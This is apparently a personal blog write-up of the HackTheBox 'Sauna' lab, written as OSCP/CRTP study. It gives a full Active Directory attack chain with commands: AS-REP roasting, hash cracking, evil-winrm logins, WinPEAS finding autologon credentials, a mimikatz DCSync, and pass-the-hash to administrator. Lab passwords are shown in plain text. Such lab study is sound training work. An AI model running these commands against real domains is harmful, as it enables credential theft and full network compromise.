Box 10: HTB - Sauna

Today we are going to solve another boot2root challenge called "Sauna". It’s available at HackTheBox for penetration testing. This is an easy level lab.

9 min readJul 2, 2022

I’ve been on the journey to pursue CRTP certification. Therefore, Windows and Active Directory pentesting is my interest at present moment.

IP Address: 10.10.10.175

Enumeration:

As my routine, utilize nmap to initialize the port/service enumeration:

nmap -A -sV -sC -p- -T4 -Pn 10.10.10.175 -vvv

→ Result from Nmap scanning:

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|*http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|*  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-04-05 01:19:48Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49697/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Port 53 — DNS service:

→ Nothing to show

Port 80 — HTTP: Microsoft IIS Web Service

→ From “Contact Us” (*http://10.10.10.175/about.html*) on Web Homepage, you can take the list of some users from here. If you find the complete names of company workers, you could try different AD username conventions (read this). The most common conventions are: NameSurname, Name.Surname, NamSur (3letters of each), Nam.Sur, NSurname, N.Surname, SurnameName, Surname.Name, SurnameN, Surname.N, 3 random letters and 3 random numbers (abc123).

Abuse the above username list, we can customize our AD enumeration to explore more new things.

Then, keep enumerating website sub-domain with gobuster:

gobuster dns -d 'egotistical-bank.local' -t 25 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

→ No interesting result

Port 88, 464 — tcp,udp used for Kerberos authentication purposes

We can enumerate non-preauth users first:

python3 ./GetNPUsers.py -dc-ip 10.10.10.175 egotistical-bank.local/

→ There’s no result. Skip

Port 135, 139 TCP — These are used for RPC → WMI service, NetBIOS services. Therefore, they can be abused for impacket/wmiexec to remote access

Port 389, 636 — Active Directory, LDAP Query

Use Nmap command with NSE Scripts for AD:

nmap -n -sV --script "ldap* and not brute" -p 389 10.10.10.175

Result: Context: DC=EGOTISTICAL-BANK,DC=LOCAL

Port 3268, 3269 — This port is used for queries specifically targeted for the Global Catalog

Port 5985 — ****A WinRm listener can listen two different ways: HTTP or HTTPS. The WinRM port for HTTP is 5985 while the WinRm port for HTTPS is 5986, by default.

Port 9389 — Active Directory Web Services

Foothold

Reuse Impacket/GetNPUsers to check non-preauth users. However, this time, we pick another tool — username-anarchy

username-anarchy — Tools for generating usernames when penetration testing.

You can found more details here: **https://pentesttools.net/username-anarchy-username-tools-for-penetration-testing/**

Syntax:

./username-anarchy --input-file <fullnames.txt> --select-format first,flast,first.last,firstl > unames.txt

-i, --input-file FILE : Input list of names. Can be SPACE, CSV or TAB delimited

-l, --list-formats : List format plugins -f, --select-format LIST : Select format plugins by name. Comma delimited list

If this’s the first time you’ve heard about this attack method. Let’s visit the following article for more details. ASEPRoasting is similar to Kerberoasting in the sense that we query accounts for TGTs, get the hash, then crack it, however in the case of ASEPRoasting there’s a very big caveat: Kerberos pre-authentication must be disabled, which is not a default setting. When you request a TGT, via a Kerberos AS-REQ message, you also supply a timestamp that is encrypted with your username and password. The Key Distribution center (KDC) then decrypts the timestamp, verifies the request is coming from that user, then continues with the authentication process. This is the pre-authentication process for Kerberos, which is obviously a problem for an attacker because we aren’t the KDC and cannot decrypt that message. Of course, this is by design, to prevent attacks, however if pre-authentication is turned off, we can send an AS-REQ to any user which will return their hashed password in return. Since pre-auth is enabled by default, it has to be manually turned off, so this is rare, however still worth mentioning.

Note: Research into ASP-Req Pre-auth Attack:

After generating the username list successfully, return to GetNPUsers script:

python3 ./GetNPUsers.py -dc-ip 10.10.10.175 -usersfile user_list.txt -no-pass -format hashcat > /home/thanhlc/HTB/Sauna/password_hash

-dc-ip ip address: IP Address of the domain controller. If ommited, it use the domain part (FQDN) specified in the target parameter

-usersfile USERSFILE : File with user per line to test

-no-pass: don't ask for password (useful for -k)

-format {hashcat,john} : format to save the AS_REQ of users without pre-authentication. Default is hashcat

→ We will find the user fsmith is set with 'Do not require Kerberos preauthentication' option

Crack the password from this AS_REP hash, use command hashcat:

hashcat -m 18200 /home/thanhlc/HTB/Sauna/hash_fsmith /usr/share/wordlists/rockyou.txt --show

→ Extracted password: Thestrokes23

User evil-winrm to remote access this machine:

./evil-winrm.rb -i 10.10.10.175 -u fsmith -p Thestrokes23

View the content of flag user.txt with type command:

Privilege Escalation

Move to the next phase — The most attractive phase

BloodHound with `fsmith` user:

Copy SharpHound.exe tool to a file share, then build-up a smb server to host this tool:

impacket-smbserver thanhsmb $(pwd) -smb2support -user thanhlc -password Admin@123

From evil-winrm session on target machine, use the following PowerShell commands to download Sharphound tool from file share (Tips fro ippsec):

$pass = convertto-securestring 'Admin@123' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('thanhlc', $pass)

New-PSDrive -Name thanhsmb -PSProvider FileSystem -Credential $cred -Root \\\\10.10.14.6\\thanhsmb

Trick: You can upload the executable script to target machine with command upload <full_path_to_script> in the evil-winrm session.

Actually, after collecting AD information with the current user (fsmith), there’s nothing to show in Bloodhound in order to help us elevate the privilege from the owned user — fsmith. Consequently, you should ignore it and try another method.

How to use WinPEAS?

You can use WinPeas will explore juicy things: **https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS**

WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz

Check also the Local Windows Privilege Escalation checklist from book.hacktricks.xyz

Next, through evil-winrm session, we can upload WinPEAS tool to the target machine:

upload /home/thanhlc/HTB/Sauna/smb/winPEASx64.exe

Now, run this tool WinPEAS to investigate deeper on this box:

.\\winPEASx64.exe

Yayyy, using WinPEAS, I found something important to loot:

Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName             :  EGOTISTICALBANK
**DefaultUserName**               :  EGOTISTICALBANK\\svc_loanmanager
**DefaultPassword**               :  Moneymakestheworldgoround!

*Note: How to Configure and Turn on automatic logon in Windows: https://docs.microsoft.com/en-us/troubleshoot/windows-server/user-profiles-and-logon/turn-on-automatic-logon

This feature applies to: Windows Server 2019, Windows Server 2016, Windows Server 2012 R2. By using this feature, other users can start your computer and use the account that you establish to automatically log on.

Important Notes: The autologon feature is provided as a convenience. However, this feature may be a security risk. If you set a computer for autologon, anyone who can physically obtain access to the computer can gain access to all the computer’s contents, including any networks it is connected to. Additionally, when autologon is turned on, the password is stored in the registry in plain text. The specific registry key that stores this value can be remotely read by the Authenticated Users group. This setting is recommended only for cases in which the computer is physically secured and steps have been taken to make sure that untrusted users cannot remotely access the registry.

With the credential of new account svc_loanmanager, we can tried logging in this machine once again with evil-winrm, then check some information related to this user.

./evil-winrm.rb -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'

We can use this following tool bloodhound-python available on Kali distro, instead of Sharphound on Windows, in order to enumerate about the domain:

bloodhound-python -d egotistical-bank.local -u svc_loanmgr -p 'Moneymakestheworldgoround!' -gc sauna.egotistical-bank.local -c all -ns 10.10.10.175

After get the .JSON enumeration files → upload all of them to Bloodhound

In Bloodhound GUI, query and select the user svc_loanmgr@egotistical-bank.local and mark it as Owned

Next step, in tab “Analysis”, select “Find Principals with DCSync Rights”

You will see that this user has both GetChanges and GetChangesAll rights on this domain. Therefore, this account can be abused to launch a DCSync Attack using mimikatz tool.

Mimikatz can be super finicky. Ideally, you can run it (Enter) and drop to a Mimikatz prompting shell, but for some reason on this box (Sauna), it just started spitting the prompt at my repeatedly and I had to kill my session many times. Till now, i have no idea about it. It’s always safer to just run mimikatz.exe with the commands you want to run following it from the command line:

.\\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator' exit

This spits out a ton of information. The hash I need (that matches the secretsdump output) is the Hash NTLM in the middle above. I could also use /all instead of /user:administrator to dump the entire cache of all users, but user administrator is all we need here.

With the NTLM hash we got from above, utilize evil-winrm and Pass-The-Hash attack to log in with administrator sesion:

evil-winrm.rb -i 10.10.10.175 -u administrator -H <ntlm_hash>

Successful login → Let’s check the security context with whoami command.

At this point, we have all privileges on this sole machine. Capturing the flag is an easy-peasy task 😄

Lesson Learned:

AS-REP Roasting Attack
Learn to handle some AD Enumeration tools, such as: BloodHound, bloodhound-python...
From the Contact list on website, we can generating the questionable usernames list when penetration testing, using username-anarchy tool
Enumerate the available PrivEsc paths on Windows with WinPEAS
How to use Mimikatz to run a DCSync attack and some tips to fix errors when using it.
Pass-the-hash Attack with tool crackmapexec, psexec.py, wmiexec.py or even evil-winrm

Finally, I end the 10th box here on my journey to study OSCP. All comments and suggestions from you will help me make much progress. It gonna be a long road ahead 💪

THANKS FOR READING AND SUPPORTING!!